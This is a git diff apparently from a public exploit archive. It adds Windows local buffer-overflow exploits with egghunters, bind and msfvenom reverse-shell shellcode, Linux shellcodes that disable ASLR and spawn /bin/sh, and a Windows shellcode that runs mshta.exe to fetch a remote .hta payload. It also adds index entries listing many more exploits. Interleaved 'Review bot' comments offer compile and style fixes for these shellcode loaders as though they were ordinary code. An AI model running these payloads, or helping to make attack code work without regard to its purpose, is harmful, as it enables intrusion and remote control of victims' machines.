b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e" +shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30" +shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86" +shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93" +shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde" +shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42" +shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61" +shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53" +shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb" +shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf" +shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c" +shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12" +shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9" +shellcode_bind += b"\xe8\xaa\x56\xc9\x38" + +egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +nops = "\x90" * 30 +junk1 = "A" * 2112 +tag = "W00TW00T" +junk2 = "B" * (2000-len(shellcode_bind+nops+tag)) +eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll + +buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter + +file.write(buffer) +file.close() \ No newline at end of file diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py new file mode 100755 index 000000000..acf6c7333 --- /dev/null +++ b/exploits/windows/local/48719.py 
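Review bot: The `#!/usr/bin/python` line sits below the header comments rather than on line 1, so it is an ordinary comment and never acts as a shebang; either move it to the first line or drop it. The same misplaced shebang appears in 48719.py in the next hunk.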
@@ -0,0 +1,99 @@ +# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) +# Date: 2020-07-26 +# Exploit Author: MasterVlad +# Vendor Homepage: http://www.verypdf.com +# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe +# Version: 8.0 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 32-bit + +# Proof of Concept: + +# 1. Run the python script +# 2. Open exploit.txt and copy the content to clipboard +# 3. Open doc2pdf_win.exe and go to File -> Add URL +# 4. Paste the clipboard into the field and click on Ok + +#!/usr/bin/python + +# encoded egghunter +egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" +egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" +egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI + +buf = "" +buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" +buf += 
"\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" +buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" +buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" +buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" +buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" +buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" +buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" +buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" +buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" +buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" +buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" +buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" +buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" +buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" +buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" +buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" +buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" +buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" +buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" +buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" +buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" +buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" +buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" +buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" +buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" +buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" +buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" +buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" +buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" +buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" +buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" +buf += 
"\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" +buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" +buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" +buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" +buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" +buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" +buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" +buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" +buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" +buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" +buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" +buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" +buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" +buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" +buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" +buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" +buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" +buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" + +exploit = "A"*3876 +exploit += "\x74\x06\x75\x04" +# 0x1001062d - pop pop ret - reg.dll +exploit += "\x2d\x06\x01\x10" +exploit += egg +exploit += "D"*(10000-3884-len(egg)-len(buf)-8) +exploit += "T00WT00W" +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cc50ac2d9..a47226220 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6754,6 +6754,7 @@ id,file,description,date,author,type,platform,port
 48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 48637,exploits/windows/dos/48637.py,"Fire Web Server 0.1 - Remote Denial of Service (PoC)",2020-07-06,"Saeed reza Zamanian",dos,windows,
 48638,exploits/linux/dos/48638.sh,"Grafana 7.0.1 - Denial of Service (PoC)",2020-07-06,mostwanted002,dos,linux,
+48697,exploits/windows/dos/48697.py,"Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)",2020-07-26,"Felipe Winsnes",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11125,6 +11126,13 @@ id,file,description,date,author,type,platform,port
 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
 48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows,
 48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows,
+48687,exploits/windows/local/48687.py,"Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)",2020-07-26,"Felipe Winsnes",local,windows,
+48688,exploits/windows/local/48688.py,"Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48689,exploits/windows/local/48689.py,"DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
+48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
+48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
+48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42933,3 +42941,23 @@ id,file,description,date,author,type,platform,port 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php, 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple, 48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware, +48690,exploits/php/webapps/48690.txt,"GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)",2020-07-26,Balzabu,webapps,php, +48692,exploits/java/webapps/48692.py,"ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection",2020-07-26,aldorm,webapps,java, +48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple, +48694,exploits/hardware/webapps/48694.txt,"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)",2020-07-26,LiquidWorm,webapps,hardware, +48698,exploits/php/webapps/48698.txt,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download",2020-07-26,KBA@SOGETI_ESEC,webapps,php, +48699,exploits/php/webapps/48699.sh,"WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)",2020-07-26,KBA@SOGETI_ESEC,webapps,php, +48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple, +48702,exploits/php/webapps/48702.txt,"LibreHealth 2.0.0 - Authenticated Remote Code Execution",2020-07-26,boku,webapps,php, +48704,exploits/php/webapps/48704.py,"Online Course Registration 1.0 - Unauthenticated Remote Code Execution",2020-07-26,boku,webapps,php, +48705,exploits/php/webapps/48705.txt,"elaniin CMS - Authentication Bypass",2020-07-26,BKpatron,webapps,php, +48706,exploits/php/webapps/48706.txt,"Koken CMS 
0.22.24 - Arbitrary File Upload (Authenticated)",2020-07-26,V1n1v131r4,webapps,php, +48707,exploits/php/webapps/48707.txt,"PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting",2020-07-26,AppleBois,webapps,php, +48708,exploits/multiple/webapps/48708.txt,"Bio Star 2.8.2 - Local File Inclusion",2020-07-26,"SITE Team",webapps,multiple, +48709,exploits/php/webapps/48709.txt,"Webtareas 2.1p - Arbitrary File Upload (Authenticated)",2020-07-26,AppleBois,webapps,php, +48711,exploits/hardware/webapps/48711.py,"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion",2020-07-26,"Carlos E. Vieira",webapps,hardware, +48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple, +48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple, +48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php, +48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php, +48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 5b4a7b3f8..b4f57a163 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -1024,3 +1024,6 @@ id,file,description,date,author,type,platform
 48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
+48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
+48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
+48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
diff --git a/shellcodes/linux_x86/48592.c b/shellcodes/linux_x86/48592.c
new file mode 100644
index 000000000..f9a60e101
--- /dev/null
+++ b/shellcodes/linux_x86/48592.c
@@ -0,0 +1,79 @@
+# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )
+# Author: Xenofon Vassilakopoulos
+# Date: 2020-06-11
+# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
+# Architecture: i686 GNU/Linux
+# Shellcode Length: 124 bytes
+# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php
+# SLAE-ID: SLAE - 1314
+# Description: polymorphic version of ASLR deactivation shellcode
+
+
+------------------ ASLR deactivation ------------------
+
+global _start
+
+section .text
+
+_start:
+ xor ebx,ebx
+ mul ebx
+ mov DWORD [esp-0x4],eax
+ mov DWORD [esp-0x8],0x65636170
+ mov DWORD [esp-0xc],0x735f6176
+ mov DWORD [esp-0x10],0x5f657a69
+ mov DWORD [esp-0x14],0x6d6f646e
+ mov DWORD [esp-0x18],0x61722f6c
+ mov DWORD [esp-0x1c],0x656e7265
+ mov DWORD [esp-0x20],0x6b2f7379
+ mov DWORD [esp-0x24],0x732f636f
+ mov DWORD [esp-0x28],0x72702f2f
+ sub esp,0x28
+ mov ebx,esp
+ mov cx,0x301
+ mov dx,0x2a1
+ add dx,0x1b
+ mov al, 0x5
+ int 0x80
+ mov ebx,eax
+ push ebx
+ mov cx,0x3b30
+ push cx
+ mov ecx,esp
+ shr edx, 16
+ inc edx
+ mov al,0x4
+ int 0x80
+ mov al,0x1
+ int 0x80
+
+------------------ shellcode ------------------
+
+
+#include
+#include
+
+unsigned char code[] = \
+ "\x31\xdb\xf7\xe3\x89\x44\x24\xfc\xc7"
+ "\x44\x24\xf8\x70\x61\x63\x65\xc7\x44"
+ "\x24\xf4\x76\x61\x5f\x73\xc7\x44\x24"
+ "\xf0\x69\x7a\x65\x5f\xc7\x44\x24\xec"
+ "\x6e\x64\x6f\x6d\xc7\x44\x24\xe8\x6c"
+ "\x2f\x72\x61\xc7\x44\x24\xe4\x65\x72"
+ "\x6e\x65\xc7\x44\x24\xe0\x79\x73\x2f"
+ "\x6b\xc7\x44\x24\xdc\x6f\x63\x2f\x73"
+ "\xc7\x44\x24\xd8\x2f\x2f\x70\x72\x83"
+ "\xec\x28\x89\xe3\x66\xb9\x01\x03\x66"
+ "\xba\xa1\x02\x66\x83\xc2\x1b\xb0\x05"
+ "\xcd\x80\x89\xc3\x53\x66\xb9\x30\x3b"
+ "\x66\x51\x89\xe1\xc1\xea\x10\x42\xb0"
+ "\x04\xcd\x80\xb0\x01\xcd\x80";
+
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+}
\ No newline at end of file
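Review bot: As committed, 48592.c does not compile: the `# Title:` header lines and the assembly listing sit outside any C comment, the two `#include` directives carry no header name (presumably `<stdio.h>` and `<string.h>`, dropped as angle-bracket text at some point), and `main()` relies on implicit int, which C99 removed. Wrapping everything above the includes in a `/* ... */` block, as 48703.c does for its listing, and declaring `int main(void)` would fix that. `printf("Shellcode Length: %d\n", strlen(code))` passes a `size_t` to `%d`; `%zu` is the matching specifier. The bare `#` header lines recur in 48703.c and 48718.c, the empty `#include` directives and the `%d`/`strlen` mismatch recur in 48703.c.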
diff --git a/shellcodes/linux_x86/48703.c b/shellcodes/linux_x86/48703.c
new file mode 100644
index 000000000..5fb2f2c38
--- /dev/null
+++ b/shellcodes/linux_x86/48703.c
@@ -0,0 +1,75 @@
+# Exploit Title: Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)
+# Author: danf42
+# Date: 2020-07-16
+# Platform: Linux/x86
+
+/*******************************************************************************
+ sigaction(2) approach to egghunting as described in the paper
+ "Safely Searching Process Virtual Address Space" by skape
+
+ The shellcode prepares the registers to start the hunting by clearing the
+ direction flag and setting eax, ecx, and edx to 0
+
+Egg value is 0x50905090
+
+global _start
+
+section .text
+
+_start:
+ cld ; clear the direction flag
+ xor ecx, ecx ; clear ecx
+ mul ecx ; multiply by ecx, zero out eax and edx
+IncPage:
+ or cx, 0xfff ; Align page address
+IncAddr:
+ inc ecx ; Go to next address
+ push byte 0x43 ; syscall for sigaction()
+ pop eax ; Put syscall value into EAX
+ int 0x80 ; call sigaction() to check memory location [ECX]
+ cmp al, 0xf2 ; Did it return EFAULT, Bad Address
+ jz IncPage ; Skip page if it returned EFAULT
+ mov eax, 0x50905090 ; Store EGG in EAX
+ mov edi, ecx ; Move ECX to EDI for scasd operation
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ scasd ; Check if [EDI] == EAX then increment EDI
+ jnz IncAddr ; Increment address if no match
+ jmp edi ; Jump to EDI (our shellcode) if both eggs are found
+
+POC Shellcode to execute /bin/sh
+ xor ecx, ecx ; clear ecx
+ mul ecx ; mutliply eax by 0
+ push eax ; push eax onto stack
+ push 0x68732f2f ; push ASCII sh// onto stack
+ push 0x6e69622f ; push ASCII nib/ onto stack
+ mov ebx, esp ; push /bin/sh into ebx
+ mov al, 0xb ; mov 11 into lower byte of eax
+ int 0x80 ; execute execve syscall
+
+ mov al,0x01 ; move 1 into lower byte of each
+ xor ebx,ebx ; clear ebx
+ int 0x80 ; execute exit syscall
+
+To Cmpile:
+ gcc sigaction_egghunter.c -fno-stack-protector -z execstack -o sigaction_egghunter
+
+*******************************************************************************/
+
+#include
+#include
+
+unsigned char egghunter[] = "\xfc\x31\xc9\xf7\xe1\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
+
+unsigned char shellcode[] = "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc9\xf7\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xcd\x80";
+
+void main()
+{
+ printf("Egghunter Length: %d\n", strlen(egghunter));
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())egghunter;
+
+ ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/48718.c b/shellcodes/windows_x86/48718.c
new file mode 100644
index 000000000..904b38aaf
--- /dev/null
+++ b/shellcodes/windows_x86/48718.c
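Review bot: `void main()` is not a conforming signature for a hosted program; `int main(void)` is the portable form and lets the harness return a status like the other loaders do. The block comment above the code also has two typos worth fixing, `To Cmpile:` for "To Compile:" and `mutliply` for "multiply". The `int (*ret)()` declaration uses an empty parameter list, which is obsolescent; `int (*ret)(void)` says what is meant.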
@@ -0,0 +1,69 @@
+# Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
+# Shellcode Author: Siddharth Sharma
+# Shellcode Length: ~100 bytes
+# Tested on: WIN7x86
+# Date: 2020-06-16
+
+/*
+
+#Description
+# Simply, instead of using mshta.exe to download file as:
+mshta.exe http://:/ ,
+# We could use below shellcode that does the same.
+
+
+
+=============================
+xor eax, eax ;clear eax,get msvcrt.dll
+mov ax, 0x7472 ;"tr\0\0"
+push eax
+push dword 0x6376736d ;cvsm
+push esp
+
+
+mov ebx,0x77e3395c ;call LoadLibraryA
+call ebx
+mov ebp,eax ;msvcrt.dll is saved in ebp
+
+
+;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
+xor eax,eax
+PUSH eax
+PUSH 0x6174682e ;".hta"
+PUSH 0x4f526157 ;"WaRO"
+PUSH 0x4b4d392f ;"/9MK"
+PUSH 0x38303830 ;"8080"
+PUSH 0x3a323931 ;"192:"
+PUSH 0x2e33342e ;".43."
+PUSH 0x3836312e ;".168"
+PUSH 0x3239312f ;"/192"
+PUSH 0x2f3a7074 ;"tp:/"
+PUSH 0x74682065 ;"e ht"
+PUSH 0x78652e61 ;"a.ex"
+PUSH 0x7468736d ;"msht"
+
+
+
+MOV EDI,ESP ;adding a pointer to the stack
+PUSH EDI
+
+
+Mov eax,0x6ffab16f ;call System
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x77e3214f ;call ExitProcess
+call eax
+=====================================
+*/
+
+
+char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int(*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file
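Review bot: The `(int)` cast in `(int)(*func)();` has no effect, the call already yields an int and the value is discarded either way; a plain `func();` reads better, and the declare-then-assign pair collapses to `int (*func)(void) = (int (*)(void))code;`. `argc` and `argv` are never used, so `int main(void)` is the accurate signature and avoids unused-parameter warnings. The buffer is `char code[]` here while the sibling loaders 48592.c and 48703.c use `unsigned char`; either works, but one convention across the three files would help.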